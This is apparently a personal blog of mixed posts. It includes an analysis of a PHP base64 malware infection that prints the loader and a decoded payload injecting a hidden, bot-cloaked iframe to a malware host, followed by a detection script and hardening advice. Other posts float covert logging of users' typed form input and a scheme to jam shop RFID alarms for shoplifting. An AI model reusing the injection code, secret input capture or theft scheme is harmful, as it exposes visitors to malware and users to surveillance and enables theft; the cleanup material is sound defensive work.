Spyjax 2.0: Input history

When you’re typing in some text, you’ll always make some kind of mistake.
Or maybe you’ll copy-paste something and then replace a few words. Maybe it’s not your text, but you can replace some of the references and make it yours; nobody knows, right?

Or do they…

Using JavaScript we can record everything the user typed 😛
I’ve mentioned this in a previous post.

I’ve made a quick demo: http://ict-blue.be/qwaxys/projects/replay/.

When you hit submit on the demo, you’ll see the result. In reality you won’t. I would just use the last text as what I need (a comment, review, solicitation?) and store the complete history in a database.

Then anytime I want (or somebody else, perhaps the future employer..) it’s just a matter of replaying that data.

Just imagine the possibilities…

Pi – Phone

Recently I bought myself a Raspberry Pi.
And today it was Retro Beurs (a sort of flea market) so I said to myself: go find something to mount the Pi in.
I had only 3 requirements:

  • The Pi should fit inside. (duh)
  • It’s gotta be cheap.
  • It should look awesome.

This is the result:
I think it looks pretty awesome 😛

After opening up I discovered I got exactly what I needed and nothing more. The phone itself wasn’t there. Neither were the speaker or microphone.
So much room for activities 😀

My ideas so far:

  • Get the dialler working with the gpio pins.
  • Get a USB microphone.
  • Build microphone and speaker into the horn.
  • Do some research on Skype, Google talk, SIP, etc
  • Configuration and programming hell. 😛

Sabam: Oh no you didn’t!

They did.

For the ones who don’t speak Dutch: Sabam is the RIAA for Belgium.
They just gave me a reply with a list of their prices 😛

Evil IT stuff


Some of these ideas are great, some are funny and others are horrific and plain wrong.
I’m not saying you should, I’m just saying you could.
These are just some random ideas about what you can do with current technology.

Social annoyance

Make a website that uses Facebook connect.
When the site is open, at random times quietly whisper the user’s first name.


Make a smartphone app that actually has a purpose.
At random times make the phone vibrate or play the default ringtone/new text tone.

Shopping spree

Make yourself an active high powered RFID tag.
Go sit across the shop and make the alarm go off every time somebody exits the shop.
Once they are sick of checking every person leaving the shop, it’s time to go shopping!

Capture somebody’s previous input

If you have a webform, you can receive the input the user has submitted.
But what about the loose ideas or copy-pastes?
Well, we can just bind an event to every input and save every action into local storage.
When the form is submitted, we add a hidden field with the form history and then continue to submit the form.

More soonish.

The Rocky Workout

Yesterday, this is what I tweeted:

And so I did.

I’ve added the song 10 times. There are 435 tracks on my iPod.

I’m not sure how random the iPod Shuffle algorithm really is, but according to my calculations the chance of having to work out is around 2.299%. That seems very reasonable 😛

Note that the workout isn’t limited to the length of the song. The song is there to get you started!

So far:

I had a little jog

I did pull-ups in the tram (top right)

I postponed my surprise workout for practical reasons at work until my lunch break (before eating) to go run up and down (once) the stairs of K12.

And more will be posted soonish.

PHP Base64 Virus

You may or may not have heard of it but it’s out there…
The virus looks something like this:

    $auth_pass = "133a113117ca7d73b44ad035e570e67b";
    $virusaworm = "7X17e9q48xyv9ESAk ... maCymQa9uHCk7"; 

And (almost) every PHP file will contain this after being infected:

    <?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDA ... XY+JzsNCn0='));

The actual code:

    $bot = FALSE ;
    $user_agent_to_filter = array('bot','spider','spyder','crawl','validator','slurp',
    ...  'wordpress','rssreader','mybloglog api');
    $stop_ips_masks = array(
    $my_ip2long = sprintf("%u",ip2long($_SERVER['REMOTE_ADDR']));
    foreach ( $stop_ips_masks as $IPs ) {
        $first_d=sprintf("%u",ip2long($IPs[0])); $second_d=sprintf("%u",ip2long($IPs[1]));
        if ($my_ip2long >= $first_d && $my_ip2long <= $second_d) {$bot = TRUE; break;}
    foreach ($user_agent_to_filter as $bot_sign){
        if  (strpos($_SERVER['HTTP_USER_AGENT'], $bot_sign) !== false){$bot = true; break;}
    if (!$bot) {
        echo '<div style="position: absolute; left: -1999px; top: -2999px;">
                <ΙFRAME src="http://example.org/QQkcEAAcDAAMBBw==" width="2" height="2"></ΙFRAME>

This means that all the pages with this code contain an invisible iframe but only when the user isn’t a bot.
That page in the iframe contains malware infecting the user.
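
To find infected files without running them, the loader can be matched and its payload decoded statically. The following is an added example, not code from the original post or from Trinetra; the indicator patterns, function names and the sample input are assumptions constructed for illustration.

```python
import base64
import binascii
import re

# The injected loader as shown in the post: eval(base64_decode('...'))
LOADER = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*(['\"])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)\s*;?")

# Traits of the decoded payload described in the post (patterns are assumptions)
INDICATORS = {
    "hidden_iframe": re.compile(r"<iframe[^>]+src=", re.I),
    "offscreen_div": re.compile(r"(left|top)\s*:\s*-\d{3,}px", re.I),
    "ua_cloaking": re.compile(r"HTTP_USER_AGENT"),
    "ip_cloaking": re.compile(r"ip2long\s*\(\s*\$_SERVER\['REMOTE_ADDR'\]"),
    "errors_silenced": re.compile(r"error_reporting\s*\(\s*0\s*\)"),
}

def decode_payload(blob):
    """Decode the base64 blob for inspection only; nothing is executed."""
    try:
        return base64.b64decode(blob).decode("latin-1")
    except (binascii.Error, ValueError):
        return ""

def scan_php(source):
    """Return one finding per loader: its offset and the indicators it matched."""
    findings = []
    for m in LOADER.finditer(source):
        payload = decode_payload(m.group(2))
        hits = sorted(n for n, rx in INDICATORS.items() if rx.search(payload))
        findings.append({"offset": m.start(), "indicators": hits})
    return findings

def strip_loader(source):
    """Remove the injected statement and keep the rest of the file as it was."""
    return LOADER.sub("", source)

# Constructed sample: a short stand-in payload shaped like the one in the post.
_PAYLOAD = ("error_reporting(0); if (strpos($_SERVER['HTTP_USER_AGENT'], 'bot') === false) "
            "{ echo '<div style=\"position: absolute; left: -1999px;\">"
            "<iframe src=\"http://example.org/placeholder\" width=\"2\"></iframe></div>'; }")
SAMPLE_INFECTED = ("<?php eval(base64_decode('"
                   + base64.b64encode(_PAYLOAD.encode()).decode()
                   + "'));\necho 'Hello';\n")

if __name__ == "__main__":
    print(scan_php(SAMPLE_INFECTED))
    print(repr(strip_loader(SAMPLE_INFECTED)))
```

Run it over a copy of the webroot and review each finding before stripping, since some legitimate code also wraps base64 data in eval().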

How do we get rid of it?

In your webroot, put a .htaccess file with the following content:

    order deny,allow
    deny from all
    allow from

Now upload Trinetra v 2.0 to your webroot and execute trinetra-cleaner2.php (locally).

After you’ve done all the steps to prevent this from happening again, delete the .htaccess file.

How do we prevent it?

In your php.ini file put the following lines:

    allow_url_fopen = off
    allow_url_include = off
    disable_functions = "apache_child_terminate, apache_setenv, define_syslog_variables, escapeshellarg, escapeshellcmd, eval, exec, fp, fput, ftp_connect, ftp_exec, ftp_get, ftp_login, ftp_nb_fput, ftp_put, ftp_raw, ftp_rawlist, highlight_file, ini_alter, ini_get_all, ini_restore, inject_code, mysql_pconnect, openlog, passthru, php_uname, phpAds_remoteInfo, phpAds_XmlRpc, phpAds_xmlrpcDecode, phpAds_xmlrpcEncode, popen, posix_getpwuid, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid, posix_setuid, posix_uname, proc_close, proc_get_status, proc_nice, proc_open, proc_terminate, shell_exec, syslog, system, xmlrpc_entity_decode"

Remove the functions you do need from this list; for example, some template systems use eval().

Change your file permissions!

Install and configure Suhosin. You can whitelist functions inside eval() so functions like base64_decode are never allowed to execute.
In that case even when some bot managed to upload the payload, it cannot be executed correctly.


Interesting readings


Achievement generator

There used to be a very pretty achievements generator at http://teamfortress2.fr/achievements.php?eng

But apparently it broke because of some missing JavaScript and CSS files.

Using archive.org I’ve managed to get those files.

Then I crammed everything together in one HTML file 🙂


Mirror: http://ict-blue.be/qwaxys/projects/TF2-achievements/


PS: you can just copy the HTML and run it locally or host it yourself 😉